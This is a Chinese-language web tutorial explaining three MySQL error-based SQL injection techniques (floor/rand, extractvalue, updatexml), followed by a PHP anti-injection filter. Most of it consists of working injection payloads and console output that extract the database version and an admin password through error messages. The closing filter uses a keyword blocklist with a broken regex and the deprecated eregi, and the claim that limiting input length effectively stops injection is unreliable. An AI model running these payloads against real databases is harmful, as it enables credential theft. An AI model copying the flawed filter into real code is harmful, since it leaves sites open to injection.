用户名:
密 码: 记住
您当前的位置:首页 > 网络编程 > mysql教程

mysql注入中三种报错模式利用方法详解

时间:2015-01-23  来源:西部数据  作者:西部数据

网站安全最容易给注入进去的就是sql数据库了,如果你使用dedecms就会经常有人在搜索中写sql注入语句,一不留神你的网站就给人家打包或放毒了,下面我来给大家分享mysql注入中三种报错模式利用方法,希望对大家有帮助.

1、通过floor报错

可以通过如下一些利用代码,代码如下:

  1. and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 
  2. and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2))); 

举例如下,首先进行正常查询,代码如下:

  1. mysql> select * from article where id = 1; 
  2. +----+-------+---------+ 
  3. | id | title | content | 
  4. +----+-------+---------+ 
  5. |  1 | test  | do it   | 
  6. +----+-------+---------+ 

假如id输入存在注入的话,可以通过如下语句进行报错,代码如下:

  1. mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a); 
  2. ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' 

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询.

例如我们需要查询管理员用户名和密码,代码如下:

  1. Method1: 
  2. mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a); 
  3. ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' 
  4. Method2: 
  5. mysql> select * from article where id = 1 and (select count(*)  from (select 1 union select null union select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2))); 
  6. ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' 
  7. 2、ExtractValue 

测试语句如下:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程,代码如下:

  1. mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));-- 
  2. ERROR 1105 (HY000): XPATH syntax error: 'admin888' 

3、UpdateXml,测试语句:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

实际测试过程,代码如下:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));

ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

上面人方法有一个特点就是查询语句很很长我们可以限制输入长度,这也可以有效的过滤不过sql注入了,下面我来给大家分享一个防sql注入函数.

1.函数的构建,代码如下:

  1. /* 
  2. 函数名称:inject_check() 
  3. 函数作用:检测提交的值是不是含有SQL注射的字符,防止注射,保护服务器安全 
  4. 参        数:$sql_str: 提交的变量 
  5. 返 回 值:返回检测结果,ture or false 
  6. */ 
  7. function inject_check($sql_str
  8.      return eregi('select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile', $sql_str);    // 进行过滤 
  9.  } 

2.函数的使用实例,代码如下:

  1. <?php 
  2. if (inject_check($_GET['id'])) 
  3.      exit('你提交的数据非法,请检查后重新提交!'); 
  4. }  //phpfensi.com 
  5. else 
  6.     $id = $_GET['id']; 
  7. //处理数据……………… 
  8. ?>
来顶一下
返回首页
返回首页
推荐资讯
WiFi太不安全:7岁女孩11分钟内入侵公共网络 WiFi太不安全:7岁女孩11分钟内入侵近期刚刚发布研究说WiFi网络能获得人们手机里多少私人信息,
不服跑个分?人工智能也出现“刷分”乱象 不服跑个分?人工智能也出现“刷分2014年,人工智能领域突然爆发,成为了科研和科技创业的热门
相关文章
    无相关信息
栏目更新
栏目热门